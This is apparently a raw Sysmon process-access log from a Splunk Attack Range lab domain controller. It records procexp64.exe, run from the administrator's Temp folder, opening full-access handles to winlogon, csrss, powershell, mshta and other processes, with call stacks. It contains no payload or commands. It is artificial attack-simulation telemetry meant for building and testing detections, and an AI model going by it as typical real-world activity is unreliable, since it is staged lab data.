15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 